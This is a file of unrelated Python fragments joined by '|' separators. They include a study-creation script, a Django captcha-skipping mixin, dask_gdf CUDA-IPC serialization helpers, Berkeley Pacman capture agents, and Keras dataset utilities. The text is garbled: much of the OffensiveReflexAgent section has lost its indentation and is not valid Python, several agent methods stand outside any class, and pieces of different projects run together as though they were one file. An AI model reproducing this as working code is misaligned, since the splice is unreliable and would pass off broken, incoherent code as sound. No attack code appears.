if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--global_config_yaml", help="global configuration file path", default=os.path.join('resources', 'config.yaml'))
    parser.add_argument(
        "--study_def_path", help="folder with study def yaml and rules json", required=True)
    args = parser.parse_args()

    configs = read_yaml(args.global_config_yaml)
    user_credentials = configs["user_credentials"]
    management_api_url = configs["management_api_url"]
    use_external_idp = should_use_external_idp(configs)

    study_path = args.study_def_path
    print(study_path)
    study_def = read_yaml(os.path.join(study_path, "props.yaml"))
    # Use a context manager so the rules file handle is not leaked.
    with open(os.path.join(study_path, "study_rules.json"), 'r', encoding='UTF-8') as rules_file:
        rules = json.load(rules_file)

    study_props = study_def["props"]
    study_obj = {
        "study": {
            "key": study_def["studyKey"],
            "status": study_def["status"],
            "secretKey": study_def["secretKey"],
            "props": {
                "systemDefaultStudy": study_props["systemDefaultStudy"],
                "startDate": study_props["startDate"],
                "name": yaml_obj_to_loc_object(study_props["name"]),
                # BUG FIX: "description" previously re-used the "name" field.
                # Use the real description when the study def provides one,
                # falling back to name for older defs without that key.
                "description": yaml_obj_to_loc_object(
                    study_props.get("description", study_props["name"])),
                "tags": [{"label": yaml_obj_to_loc_object(t)} for t in study_props["tags"]]
            },
            "rules": rules
        }
    }

    if "configs" in study_def:
        allowParticipantFiles = study_def["configs"]["allowParticipantFiles"]
        idMappingMethod = study_def["configs"]["idMappingMethod"]
        study_obj["study"]["configs"] = {
            # Upload rule is "gt(1, X)": X = 0 permits uploads (1 > 0),
            # X = 2 blocks them (1 > 2 is false).
            "participantFileUploadRule": {
                "name": "gt",
                "data": [
                    { "dtype": "num", "num": 1},
                    { "dtype": "num", "num": 0 if allowParticipantFiles == True else 2 }
                ]
            },
            "idMappingMethod": idMappingMethod
        }

    client = ManagementAPIClient(
        management_api_url, user_credentials, use_external_idp=use_external_idp)
    client.create_study(study_obj)
|
class PreventCaptchaRevalidationMixin:
    """Stop wizard finalization from re-posting the captcha response.

    get_all_cleaned_data() revalidates every form, which re-submits the
    same captcha response to Google.  That response is a nonce, so Google
    rejects it the second time it is seen.  Once the wizard reaches the
    "done" step, this mixin therefore strips the captcha field from any
    form it rebuilds before get_all_cleaned_data runs.
    """

    should_ignore_captcha = False

    def render_done(self, *args, **kwargs):
        # From this point on, rebuilt forms must skip captcha validation.
        self.should_ignore_captcha = True
        return super().render_done(*args, **kwargs)

    def get_form(self, step=None, *args, **kwargs):
        form = super().get_form(step=step, *args, **kwargs)
        if not self.should_ignore_captcha:
            return form
        # pop() with a default: not every step's form carries a captcha.
        form.fields.pop('captcha', None)
        return form
|
import os
import sys
from types import MethodType
# A flag to allow dask_gdf to detect and warn if
# IPC serialization is unavailable
CUSTOM_SERIALIZATION_AVAILABLE = False
try:
    # dask.distributed is an optional dependency; degrade gracefully when
    # it is missing.
    import distributed.protocol as _dp
    from distributed.utils import has_keyword
except ImportError:
    def register_distributed_serializer(cls):
        """Dummy no-op function.

        Installed when dask.distributed is unavailable so that callers can
        register classes unconditionally.
        """
        pass
else:
    CUSTOM_SERIALIZATION_AVAILABLE = True
    def register_distributed_serializer(cls):
        """Register serialization methods for dask.distributed.
        """
        _dp.register_serialization(cls, _serialize, _deserialize)
    def has_context_keyword(meth):
        # Bound methods must be unwrapped before inspecting their signature.
        if isinstance(meth, MethodType):
            return has_keyword(meth.__func__, 'context')
        else:
            return has_keyword(meth, 'context')
def _serialize(df, context=None):
    """Serialize *df* for dask.distributed, embedding its reconstructor.

    The object's own ``serialize`` method does the heavy lifting; the
    class-level ``deserialize`` method is serialized into the header so the
    receiving side can rebuild the object in :func:`_deserialize`.
    """
    def nested_serialize(obj):
        # Propagate the transfer context into nested serialization calls.
        return _dp.serialize(obj, context=context)

    serialize_meth = df.serialize
    # Only pass context= when the method's signature accepts it.
    if has_context_keyword(serialize_meth):
        header, frames = serialize_meth(nested_serialize, context=context)
    else:
        header, frames = serialize_meth(nested_serialize)

    # 'reconstructor' is our reserved header slot; it must not collide.
    assert 'reconstructor' not in header
    header['reconstructor'] = nested_serialize(type(df).deserialize)
    return header, frames
def _deserialize(header, frames):
    """Rebuild an object serialized by :func:`_serialize`."""
    rebuild = _dp.deserialize(*header['reconstructor'])
    # A missing reconstructor means the header was not produced by _serialize.
    assert rebuild is not None, 'None {}'.format(header['type'])
    return rebuild(_dp.deserialize, header, frames)
def _parse_transfer_context(context):
    """Inspect a transfer *context* and report destination locality.

    Returns:
        (same_node, same_process): whether sender and recipient share a
        host, and additionally a port (i.e. the same worker process).
        Both are False when the context lacks address information.
    """
    from distributed.comm.addressing import parse_host_port, parse_address

    if 'recipient' not in context or 'sender' not in context:
        return False, False

    def host_port(addr):
        # Strip the scheme, then split the location into (host, port).
        return parse_host_port(parse_address(addr)[1])

    recipient_host, recipient_port = host_port(context['recipient'])
    sender_host, sender_port = host_port(context['sender'])
    same_node = recipient_host == sender_host
    return same_node, same_node and recipient_port == sender_port
# Opt-out switch: set DASK_GDF_USE_IPC=0 in the environment to disable
# CUDA-IPC transfers entirely (enabled by default).
_CONFIG_USE_IPC = bool(int(os.environ.get("DASK_GDF_USE_IPC", "1")))
def should_use_ipc(context):
    """Use destination context info to determine if we should use CUDA-IPC.

    Parameters
    ----------
    context : dict or None
        If not ``None``, it contains information about the destination.
        See custom serialization in dask.distributed.

    Returns
    -------
    return_value : bool
        ``True`` if it is possible to perform CUDA IPC transfer to the
        destination.
    """
    precluded = (
        not _CONFIG_USE_IPC                      # user opt-out via env var
        or not sys.platform.startswith('linux')  # CUDA IPC is Linux-only
        or context is None                       # no destination info given
    )
    if precluded:
        return False
    # IPC only works when sender and recipient share the same node.
    same_node, _same_process = _parse_transfer_context(context)
    return bool(same_node)
|
# baselineTeam.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# baselineTeam.py
# ---------------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
from captureAgents import CaptureAgent
import distanceCalculator
import random, time, util, sys
from game import Directions
import game
from util import nearestPoint
#################
# Team creation #
#################
import sys
sys.path.append("teams/<montecarlo>/")
def createTeam(firstIndex, secondIndex, isRed,
               first='OffensiveReflexAgent', second='DefensiveReflexAgent'):
    """
    This function should return a list of two agents that will form the
    team, initialized using firstIndex and secondIndex as their agent
    index numbers. isRed is True if the red team is being created, and
    will be False if the blue team is being created.
    As a potentially helpful development aid, this function can take
    additional string-valued keyword arguments ("first" and "second" are
    such arguments in the case of this function), which will come from
    the --redOpts and --blueOpts command-line arguments to capture.py.
    For the nightly contest, however, your team will be created without
    any extra arguments, so you should make sure that the default
    behavior is what you want for the nightly contest.
    """
    # NOTE(review): eval() instantiates whatever class names arrive via
    # --redOpts/--blueOpts — only trusted names should ever be passed here.
    return [eval(first)(firstIndex), eval(second)(secondIndex)]
##########
# Agents #
##########
class ReflexCaptureAgent(CaptureAgent):
    """
    A base class for reflex agents that chooses score-maximizing actions
    """

    def registerInitialState(self, gameState):
        # Remember the spawn position for later distance bookkeeping.
        self.start = gameState.getAgentPosition(self.index)
        CaptureAgent.registerInitialState(self, gameState)

    def getSuccessor(self, gameState, action):
        """
        Finds the next successor which is a grid position (location tuple).
        """
        successor = gameState.generateSuccessor(self.index, action)
        pos = successor.getAgentState(self.index).getPosition()
        if pos == nearestPoint(pos):
            return successor
        # Only half a grid position was covered; apply the action once more.
        return successor.generateSuccessor(self.index, action)

    def evaluate(self, gameState, action):
        """
        Computes a linear combination of features and feature weights
        """
        features = self.getFeatures(gameState, action)
        weights = self.getWeights(gameState, action)
        # Counter * dict implements the dot product over shared keys.
        return features * weights

    def getFeatures(self, gameState, action):
        """
        Returns a counter of features for the state
        """
        feats = util.Counter()
        feats['successorScore'] = self.getScore(self.getSuccessor(gameState, action))
        return feats

    def getWeights(self, gameState, action):
        """
        Normally, weights do not depend on the gamestate. They can be either
        a counter or a dictionary.
        """
        return {'successorScore': 1.0}
class OffensiveReflexAgent(ReflexCaptureAgent):
"""
A reflex agent that seeks food. This is an agent
we give you to get an idea of what an offensive agent might look like,
but it is by no means the best or only way to build an offensive agent.
"""
def getFeatures(self, gameState, action):
"""
Get features used for state evaluation.
"""
features = util.Counter()
successor = self.getSuccessor(gameState, action)
# Compute score from successor state
features['successorScore'] = self.getScore(successor)
# get current position of the agent
myPos = successor.getAgentState(self.index).getPosition()
# Compute distance to the nearest food
foodList = self.getFood(successor).asList()
if len(foodList) > 0:
minDistance = min([self.getMazeDistance(myPos, food) for food in foodList])
features['distanceToFood'] = minDistance
# Compute distance to closest ghost
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
inRange = filter(lambda x: not x.isPacman and x.getPosition() != None, enemies)
if len(inRange) > 0:
positions = [agent.getPosition() for agent in inRange]
closest = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closest)
if closestDist <= 5:
# print(myPos,closest,closestDist)
features['distanceToGhost'] = closestDist
else:
probDist = []
for i in self.getOpponents(successor):
probDist.append(successor.getAgentDistances()[i])
features['distanceToGhost'] = min(probDist)
enemiesPacMan = [successor.getAgentState(i) for i in self.getOpponents(successor)]
Range = filter(lambda x: x.isPacman and x.getPosition() != None, enemiesPacMan)
if len(Range) > 0:
positions = [agent.getPosition() for agent in Range]
closest = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closest)
if closestDist < 4:
# print(myPos,closest,closestDist)
features['distanceToEnemiesPacMan'] = closestDist
else:
features['distanceToEnemiesPacMan'] = 0
# Compute distance to the nearest capsule
capsuleList = self.getCapsules(successor)
if len(capsuleList) > 0:
minDistance = min([self.getMazeDistance(myPos, c) for c in capsuleList])
features['distanceToCapsule'] = minDistance
else:
features['distanceToCapsule'] = 0
# Compute if is pacman
features['isPacman'] = 1 if successor.getAgentState(self.index).isPacman else 0
# features['distanceToMid'] = min([self.cap.distancer.getDistance(myPos, i)
# for i in self.noWallSpots])
# Compute the distance to the nearest boundary
boundaryMin = 1000000
for i in range(len(self.boundary)):
disBoundary = self.getMazeDistance(myPos, self.boundary[i])
if (disBoundary < boundaryMin):
boundaryMin = disBoundary
features['returned'] = boundaryMin
features['carrying'] = successor.getAgentState(self.index).numCarrying
return features
def getWeights(self, gameState, action):
"""
Get weights for the features used in the evaluation.
"""
# If opponent is scared, the agent should not care about distanceToGhost
successor = self.getSuccessor(gameState, action)
numOfFood = len(self.getFood(successor).asList())
numOfCarrying = successor.getAgentState(self.index).numCarrying
myPos = successor.getAgentState(self.index).getPosition()
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
inRange = filter(lambda x: not x.isPacman and x.getPosition() != None, enemies)
if len(inRange) > 0:
"""
positions = [agent.getPosition() for agent in inRange]
closestPos = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closestPos)
closest_enemies = filter(lambda x: x[0] == closestPos, zip(positions, inRange))"""
for agent in inRange:
if agent.scaredTimer > 0:
if agent.scaredTimer > 6:
return {'successorScore': 50, 'distanceToFood': -5, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 0, 'distanceToCapsule': 0, 'returned': -10, 'carrying': 20}
elif 3 < agent.scaredTimer <= 6 and numOfCarrying >= 7:
return {'successorScore': 510, 'distanceToFood': -3, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 2, 'distanceToCapsule': 0, 'returned': -100,
'carrying': 20}
elif numOfCarrying == 0 and not successor.getAgentState(self.index).isPacman:
return {'successorScore': 23, 'distanceToFood': -3, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 1, 'distanceToCapsule': -5, 'returned': 0, 'carrying': 20}
else:
return {'successorScore': 510, 'distanceToFood': -1, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 40, 'distanceToCapsule': -51, 'returned': -100, 'carring': 20}
# If I am not PacMan the enemy is a pacMan, I can try to eliminate him
# Attacker only try to defence if it is close to it (less than 4 steps)
enemiesPacMan = [successor.getAgentState(i) for i in self.getOpponents(successor)]
Range = filter(lambda x: x.isPacman and x.getPosition() != None, enemiesPacMan)
if len(Range) > 0 and not successor.getAgentState(self.index).isPacman:
return {'successorScore': 2, 'distanceToFood': -3, 'distanceToEnemiesPacMan': -500,
'distanceToCapsule': 0, 'distanceToGhost': 0,
'returned': 0, 'carrying': 20}
# Weights normally used
# if 2<= numOfFood <=6:
# return {'successorScore': 0, 'distanceToFood': 0,
# 'distanceToGhost': 20, 'distanceToCapsule': 0, 'returned': 0, 'carring': 0}
if gameState.getAgentState(self.index).numCarrying == 7:
return {'successorScore': 500, 'distanceToFood': 10, 'distanceToGhost': 20, 'distanceToEnemiesPacMan': 0,
'distanceToCapsule': -55, 'returned': -1000, 'carrying': 0}
return {'successorScore': 30, 'distanceToFood': -5, 'distanceToGhost': 0, 'distanceToEnemiesPacMan': 0,
'distanceToCapsule': -3, 'returned': 0, 'carrying': 35}
    def allSimulation(self, depth, gameState, decay):
        """Exhaustive rollout: expand every legal action down to *depth*.

        Each level's evaluation is discounted by *decay* per step; the best
        discounted value found is returned.
        """
        new_state = gameState.deepCopy()
        if depth == 0:
            # Base case: evaluate one randomly chosen action (result_list
            # holds a single value here, so max() is effectively a no-op).
            result_list = []
            actions = new_state.getLegalActions(self.index)
            actions.remove(Directions.STOP)
            """
            reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
            if reversed_direction in actions and len(actions) > 1:
                actions.remove(reversed_direction)"""
            a = random.choice(actions)
            next_state = new_state.generateSuccessor(self.index, a)
            result_list.append(self.evaluate(next_state, Directions.STOP))
            return max(result_list)
        # Recursive case: branch on every legal action.
        result_list = []
        actions = new_state.getLegalActions(self.index)
        # The agent should not stay put in the simulation
        # actions.remove(Directions.STOP)
        # current_direction = new_state.getAgentState(self.index).configuration.direction
        # The agent should not use the reverse direction during simulation
        """
        reversed_direction = Directions.REVERSE[current_direction]
        if reversed_direction in actions and len(actions) > 1:
            actions.remove(reversed_direction)
        """
        # Expand each action and recurse with reduced depth.
        for a in actions:
            # Compute new state and update depth
            next_state = new_state.generateSuccessor(self.index, a)
            result_list.append(
                self.evaluate(next_state, Directions.STOP) + decay * self.allSimulation(depth - 1, next_state, decay))
        return max(result_list)
def randomSimulation(self, depth, gameState, decay):
"""
Random simulate some actions for the agent. The actions other agents can take
are ignored, or, in other words, we consider their actions is always STOP.
The final state from the simulation is evaluated.
"""
new_state = gameState.deepCopy()
value = self.evaluate(new_state, Directions.STOP)
decay_index = 1
while depth > 0:
# Get valid actions
actions = new_state.getLegalActions(self.index)
# The agent should not stay put in the simulation
# actions.remove(Directions.STOP)
current_direction = new_state.getAgentState(self.index).configuration.direction
# The agent should not use the reverse direction during simulation
reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
if reversed_direction in actions and len(actions) > 1:
actions.remove(reversed_direction)
# Randomly chooses a valid action
a = random.choice(actions)
# Compute new state and update depth
new_state = new_state.generateSuccessor(self.index, a)
value = value + decay ** decay_index * self.evaluate(new_state, Directions.STOP)
depth -= 1
decay_index += 1
# Evaluate the final simulation state
return value
def randomSimulation1(self, depth, gameState):
    """
    Run one random playout of `depth` moves for this agent (other agents are
    treated as if they always STOP) and evaluate only the final state.

    :param depth: number of random moves to simulate
    :param gameState: state to start from (not mutated; a deep copy is used)
    :return: evaluation score of the state reached at the end of the playout
    """
    new_state = gameState.deepCopy()
    while depth > 0:
        actions = new_state.getLegalActions(self.index)
        # Staying put wastes a simulation step.
        actions.remove(Directions.STOP)
        # Avoid immediately backtracking unless it is the only option.
        # (FIX: dropped an unused duplicate `current_direction` local.)
        reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
        if reversed_direction in actions and len(actions) > 1:
            actions.remove(reversed_direction)
        # Randomly choose a valid action and advance the playout.
        a = random.choice(actions)
        new_state = new_state.generateSuccessor(self.index, a)
        depth -= 1
    # Evaluate only the final simulated state.
    return self.evaluate(new_state, Directions.STOP)
def __init__(self, index):
    # Plain CaptureAgent construction; all map pre-computation happens later
    # in registerInitialState (which has the 15 s setup budget).
    CaptureAgent.__init__(self, index)
    # Variables used to verify if the agent is locked (currently disabled):
    # self.numEnemyFood = "+inf"
    # self.inactiveTime = 0
# Implement this method for pre-processing (15 s max).
def registerInitialState(self, gameState):
    """
    One-time map pre-computation (15 s budget): walks the maze to build
    self.deadEnds, a table mapping (entry position, entry direction) to the
    depth of the dead-end corridor behind it, and self.boundary, the list of
    wall-free cells on our side of the central column.
    """
    CaptureAgent.registerInitialState(self, gameState)
    # (entry position, entry direction) -> corridor depth of the dead end.
    self.deadEnds = {}
    # Every walkable (non-wall) cell of the layout, consumed as we explore.
    self.feasible = []
    for i in range(1, gameState.data.layout.height - 1):
        for j in range(1, gameState.data.layout.width - 1):
            if not gameState.hasWall(j, i):
                self.feasible.append((j, i))
    # Frontier of states to explore, seeded with every legal first move.
    crossRoad = util.Queue()
    currentState = gameState
    # Entrance of the corridor currently being walked.
    entPos = currentState.getAgentPosition(self.index)
    entDirection = currentState.getAgentState(self.index).configuration.direction
    actions = currentState.getLegalActions(self.index)
    # (FIX: removed leftover debug print of the action list.)
    actions.remove(Directions.STOP)
    for a in actions:
        crossRoad.push(currentState.generateSuccessor(self.index, a))
    # While some positions remain unexplored on the frontier:
    while not crossRoad.isEmpty():
        currentState = crossRoad.pop()
        depth = 0
        entPos = currentState.getAgentState(self.index).getPosition()
        entDirection = currentState.getAgentState(self.index).configuration.direction
        while True:
            currentPos = currentState.getAgentState(self.index).getPosition()
            actions = currentState.getLegalActions(self.index)
            actions.remove(Directions.STOP)
            currentDirection = currentState.getAgentState(self.index).configuration.direction
            # Already visited (or out of the walkable set): stop this walk.
            if currentPos not in self.feasible:
                break
            self.feasible.remove(currentPos)
            # Never walk back the way we came while measuring a corridor.
            if Directions.REVERSE[currentDirection] in actions:
                actions.remove(Directions.REVERSE[currentDirection])
            if len(actions) == 0:
                # Dead end: record the corridor length from the entry point.
                self.deadEnds[(entPos, entDirection)] = depth + 1
                break
            elif len(actions) == 1:
                # Corridor: only one way forward, keep walking.
                depth = depth + 1
                currentState = currentState.generateSuccessor(self.index, actions[0])
            else:
                # Crossroad: fan out the successors and restart from frontier.
                for a in actions:
                    crossRoad.push(currentState.generateSuccessor(self.index, a))
                break
    # (FIX: removed leftover debug loop printing the dead-end table.)
    self.distancer.getMazeDistances()
    # Home-boundary column. FIX: use floor division so hasWall receives an
    # int under Python 3 as well (identical result under Python 2).
    if self.red:
        centralX = (gameState.data.layout.width - 2) // 2
    else:
        centralX = ((gameState.data.layout.width - 2) // 2) + 1
    self.boundary = []
    for i in range(1, gameState.data.layout.height - 1):
        if not gameState.hasWall(centralX, i):
            self.boundary.append((centralX, i))
def chooseAction(self, gameState):
    """
    Pick the move whose one-step exhaustive simulation (allSimulation with
    depth 1, decay 0.8) scores highest; ties are broken randomly.
    """
    start = time.time()
    # Staying put is almost never a good choice, so ignore STOP.
    actions = gameState.getLegalActions(self.index)
    actions.remove(Directions.STOP)
    fvalues = []
    for a in actions:
        new_state = gameState.generateSuccessor(self.index, a)
        # Monte-Carlo alternative kept for reference:
        # value = sum(self.randomSimulation(3, new_state, 0.8) / 30 for _ in range(30))
        fvalues.append(self.allSimulation(1, new_state, 0.8))
    best = max(fvalues)
    # FIX: materialise the ties as a list (Py3 `filter` objects do not
    # support random.choice) and drop the leftover debug print.
    ties = [pair for pair in zip(fvalues, actions) if pair[0] == best]
    toPlay = random.choice(ties)[1]
    # FIX: print-statement syntax replaced with the function form so the
    # profiling line works on both Python 2 and 3.
    print('eval time for offensive agent %d: %.4f' % (self.index, time.time() - start))
    return toPlay
class DefensiveReflexAgent(ReflexCaptureAgent):
    """
    A reflex agent that keeps its side Pacman-free: it patrols the central
    boundary (biased towards the patrol points closest to our food), chases
    any visible invader, and investigates positions where food disappeared.
    """

    def __init__(self, index):
        CaptureAgent.__init__(self, index)
        # Current chase/patrol target position (None = pick a new one).
        self.target = None
        # Snapshot of our food from the previous turn, to detect eaten dots.
        self.lastObservedFood = None
        # patrol point -> probability of being selected as the next target.
        self.patrolDict = {}

    def distFoodToPatrol(self, gameState):
        """
        For each patrol point, compute the distance to the closest defended
        pacdot; the (normalised) inverse of that distance becomes the
        probability of selecting that point as a target.
        """
        food = self.getFoodYouAreDefending(gameState).asList()
        total = 0
        for position in self.noWallSpots:
            # FIX: was the string "+inf", which only compared correctly under
            # Python 2's mixed-type ordering; use a real float sentinel.
            closestFoodDist = float('inf')
            for foodPos in food:
                dist = self.getMazeDistance(position, foodPos)
                if dist < closestFoodDist:
                    closestFoodDist = dist
            # We can't divide by 0!
            if closestFoodDist == 0:
                closestFoodDist = 1
            self.patrolDict[position] = 1.0 / float(closestFoodDist)
            total += self.patrolDict[position]
        # Normalize the values used as probabilities.
        if total == 0:
            total = 1
        for x in self.patrolDict.keys():
            self.patrolDict[x] = float(self.patrolDict[x]) / float(total)

    def selectPatrolTarget(self):
        """
        Sample a patrol point according to the probabilities in patrolDict.
        """
        rand = random.random()
        cumulative = 0.0  # FIX: renamed from `sum`, which shadowed the builtin
        chosen = None
        for point in self.patrolDict.keys():
            chosen = point
            cumulative += self.patrolDict[point]
            if rand < cumulative:
                return point
        # FIX: floating-point round-off could leave rand >= the cumulative
        # total, making the original fall through and return None; fall back
        # to the last point instead.
        return chosen

    # Implement this method for pre-processing (15 s max).
    def registerInitialState(self, gameState):
        CaptureAgent.registerInitialState(self, gameState)
        self.distancer.getMazeDistances()
        # Compute central wall-free positions from the map layout; the
        # defender walks among these to defend its territory.
        # FIX: floor division keeps centralX an int on Python 3 as well.
        if self.red:
            centralX = (gameState.data.layout.width - 2) // 2
        else:
            centralX = ((gameState.data.layout.width - 2) // 2) + 1
        self.noWallSpots = []
        for i in range(1, gameState.data.layout.height - 1):
            if not gameState.hasWall(centralX, i):
                self.noWallSpots.append((centralX, i))
        # Trim the patrol list: no need to cover every central cell.
        while len(self.noWallSpots) > (gameState.data.layout.height - 2) // 2:
            self.noWallSpots.pop(0)
            self.noWallSpots.pop(len(self.noWallSpots) - 1)
        # Update probabilities for each patrol point.
        self.distFoodToPatrol(gameState)

    # Implement this method to control the agent (1 s max).
    def chooseAction(self, gameState):
        # If some of our food was eaten we must refresh the patrol-point
        # probabilities before picking a target.
        if self.lastObservedFood and len(self.lastObservedFood) != len(self.getFoodYouAreDefending(gameState).asList()):
            self.distFoodToPatrol(gameState)
        mypos = gameState.getAgentPosition(self.index)
        if mypos == self.target:
            self.target = None
        # If we can see an invader, go after the closest one.
        # (FIX: removed an unused `x = self.getOpponents(gameState)` local and
        # replaced filter() with a list comprehension — the Py3 filter object
        # has no len() and cannot feed random.choice.)
        enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]
        invaders = [enemy for enemy in enemies if enemy.isPacman and enemy.getPosition() is not None]
        if len(invaders) > 0:
            positions = [agent.getPosition() for agent in invaders]
            self.target = min(positions, key=lambda pos: self.getMazeDistance(mypos, pos))
        # Otherwise, if a pacdot just disappeared, investigate that spot.
        elif self.lastObservedFood is not None:
            eaten = set(self.lastObservedFood) - set(self.getFoodYouAreDefending(gameState).asList())
            if len(eaten) > 0:
                self.target = eaten.pop()
        # Remember our pacdots for the next turn.
        self.lastObservedFood = self.getFoodYouAreDefending(gameState).asList()
        # No enemy in sight and nothing disappearing: with few dots left,
        # walk among them; otherwise patrol the central area.
        if self.target is None and len(self.getFoodYouAreDefending(gameState).asList()) <= 4:
            food = self.getFoodYouAreDefending(gameState).asList() \
                + self.getCapsulesYouAreDefending(gameState)
            self.target = random.choice(food)
        elif self.target is None:
            self.target = self.selectPatrolTarget()
        # Take the action that brings us closest to the target, never staying
        # put and never crossing into the enemy side.
        actions = gameState.getLegalActions(self.index)
        goodActions = []
        fvalues = []
        for a in actions:
            new_state = gameState.generateSuccessor(self.index, a)
            if not new_state.getAgentState(self.index).isPacman and not a == Directions.STOP:
                newpos = new_state.getAgentPosition(self.index)
                goodActions.append(a)
                fvalues.append(self.getMazeDistance(newpos, self.target))
        # Randomly choose between ties.
        best = min(fvalues)
        ties = [pair for pair in zip(fvalues, goodActions) if pair[0] == best]
        return random.choice(ties)[1]
"""
def getFeatures(self, gameState, action):
features = util.Counter()
successor = self.getSuccessor(gameState, action)
myState = successor.getAgentState(self.index)
myPos = myState.getPosition()
# Computes whether we're on defense (1) or offense (0)
features['onDefense'] = 1
if myState.isPacman: features['onDefense'] = 0
# Computes distance to invaders we can see
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]
features['numInvaders'] = len(invaders)
if len(invaders) > 0:
dists = [self.getMazeDistance(myPos, a.getPosition()) for a in invaders]
features['invaderDistance'] = min(dists)
if action == Directions.STOP: features['stop'] = 1
rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]
if action == rev: features['reverse'] = 1
return features
def getWeights(self, gameState, action):
return {'numInvaders': -1000, 'onDefense': 100, 'invaderDistance': -10, 'stop': -100, 'reverse': -2}
""" |
import cv2
import json
import keras
import os
import tensorflow as tf
from typing import Tuple
from dataset.image_dataset import ImageDataset, ImagePreprocessor
from experiment_logger.loggable import ObjectDict
from keras_scripts.os_wrapper import list_images, list_subfolders
def get_x_shape_from_root_folder(root_folder_path: str):
    """Return the shape (as a list, e.g. [H, W, C]) of the first image found
    under any subfolder of `root_folder_path`.

    NOTE(review): implicitly returns None when no subfolder contains an
    image — confirm callers handle that case.
    """
    for subfolder in list_subfolders(root_folder_path):
        folder = os.path.join(root_folder_path, subfolder)
        for image_name in list_images(folder):
            first_image = cv2.imread(os.path.join(folder, image_name))
            return list(first_image.shape)
def prepare_image_dataset_from_root_folder(root_folder_path: str, name: str, img_shape: Tuple[int, int, int], test_portion: float):
    """Build an ImageDataset from a folder tree, optionally split off a test
    portion, and dump the resulting dataset(s) as JSON next to the data.

    :param root_folder_path: root directory whose subfolders are the classes
    :param name: dataset name, used as the output file stem
    :param img_shape: target image shape for the preprocessor, or None
    :param test_portion: fraction for the test split; falsy = no split
    """
    dataset = (ImageDataset.from_root_folder(root_folder_path, name=name)
               .upsampled()
               .shuffled()
               .index_encoded()
               .onehot_encoded())
    if img_shape is not None:
        preprocessor = ImagePreprocessor()
        preprocessor.reshape_to = img_shape
        dataset.preprocessor = preprocessor
    save_path = os.path.join(root_folder_path, name)
    if test_portion:
        test_set, dataset = dataset.split(test_portion, suffixes=('test', 'train'))
        test_path = save_path + '_test.json'
        save_path = save_path + '_train.json'
        with open(test_path, 'w') as handle:
            json.dump(test_set.to_object_dict(), handle, indent=4)
    # NOTE(review): when test_portion is falsy the train dump keeps the bare
    # dataset name with no '_train.json' suffix — behaviour preserved from
    # the original; confirm it is intended.
    with open(save_path, 'w') as handle:
        json.dump(dataset.to_object_dict(), handle, indent=4)
def load_saved_image_dataset(dataset_path: str):
    """Load the '<path>_train.json' / '<path>_test.json' pair written by
    prepare_image_dataset_from_root_folder.

    :return: (train_dataset, test_dataset)
    """
    def _load(path):
        # Each file holds an ObjectDict-serialised dataset.
        with open(path, 'r') as handle:
            return ObjectDict(json.load(handle)).to_object()

    return _load(dataset_path + '_train.json'), _load(dataset_path + '_test.json')
def get_highest_model_version_nr(root_path: str, dataset_name: str, model_date):
    """Return the highest integer N among files named
    '<dataset_name>_<model_date>_<N>.h5' in `root_path`, or -1 if none exist.
    """
    prefix = dataset_name + '_' + str(model_date) + '_'
    found = set()
    for entry in os.listdir(root_path):
        stem, ext = os.path.splitext(entry)
        if ext == '.h5' and stem.startswith(prefix):
            # Only keep files whose suffix parses as an integer version.
            try:
                found.add(int(stem[len(prefix):]))
            except ValueError:
                pass
    return max(found, default=-1)
def train_model(model, train, epochs: int, save_path: str) -> None:
    """Fit `model` on train.X / train.y (batch size 128, 10% validation
    split) and persist the trained model to `save_path`.
    """
    model.fit(train.X, train.y, epochs=epochs, batch_size=128, validation_split=0.1)
    model.save(save_path)
def test_model(model, test) -> None:
score = model.evaluate(test.X, test.y, batch_size=128)
print(score)
return
def save_keras_model_as_saved_model(model, pb_model_directory):
    """Export a Keras model as a TensorFlow SavedModel (protobuf) directory.

    NOTE(review): this uses the TF1-era `tf.saved_model.builder` / session
    API; under TF2 these live in `tf.compat.v1` — confirm the pinned
    TensorFlow version before reuse.
    """
    builder = tf.saved_model.builder.SavedModelBuilder(pb_model_directory)
    # Map the model's symbolic input/output tensors into a serving signature.
    signature = tf.saved_model.signature_def_utils.predict_signature_def(inputs={'inputs': model.input}, outputs={'outputs': model.output})
    # Attach the current Keras session's graph and variables under the
    # standard SERVING tag so the export is loadable by TF Serving.
    builder.add_meta_graph_and_variables(
        sess=keras.backend.get_session(),
        tags=[tf.saved_model.tag_constants.SERVING],
        signature_def_map={tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: signature}
    )
    builder.save()
"""editing_type_count_by_group
Generating a editing site distribution plot for RESIC
"""
from Experiments.forontiers_jupyter.bar_utils import stacked_bar
import numpy as np
import matplotlib.pyplot as plt
import os
